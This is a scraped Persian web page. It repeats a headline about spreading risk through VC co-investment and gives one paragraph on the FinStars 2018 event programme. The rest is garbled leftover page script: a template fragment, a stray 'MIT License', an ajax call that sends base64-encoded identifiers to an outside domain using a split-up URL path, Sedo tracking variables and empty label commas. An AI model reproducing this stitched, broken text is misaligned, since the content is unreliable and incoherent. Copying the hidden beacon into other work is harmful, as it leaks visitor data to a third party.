توزیع ریسک، ماحصل سرمایه‌گذاری مشترک میان VCها

توزیع ریسک، ماحصل سرمایه‌گذاری مشترک میان VCها
برگزاری کارگاه‌های آموزشی، تشکیل پنل‌های تخصصی، ارائه تجارب موفق و ناموفق تیم‌ها، برگزاری مسابقه استارت‌آپ‌ها و حل چالش‌های مطرح‌شده و برگزاری جلسات خصوصی سرمایه‌گذاری و مشاوره اهم برنامه‌های فین‌استارز2018 را تشکیل می‌دهند.

توزیع ریسک، ماحصل سرمایه‌گذاری مشترک میان VCها

برگزاری کارگاه‌های آموزشی، تشکیل پنل‌های تخصصی، ارائه تجارب موفق و ناموفق تیم‌ها، برگزاری مسابقه استارت‌آپ‌ها و حل چالش‌های مطرح‌شده و برگزاری جلسات خصوصی سرمایه‌گذاری و مشاوره اهم برنامه‌های فین‌استارز2018 را تشکیل می‌دهند.
توزیع ریسک، ماحصل سرمایه‌گذاری مشترک میان VCها
MIT License i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=MTM2LjI0My43Ni43MA==&681=MTUxOTY2NTc3ODNiODUxZjM4OGJlNmE1ZDIwMWRhZmIzZjdlYTdjOTQ2&crc=0ab35e1ec87866e61f8c100f0b4c915393c45eeb&cv=1’});

var iam_data = {
“st”: “sedo”,
“cp”: “322”,
“sv”: “in”
};

iom.c(iam_data, 0);

label, , , , , , , , , , , , , ,

About the author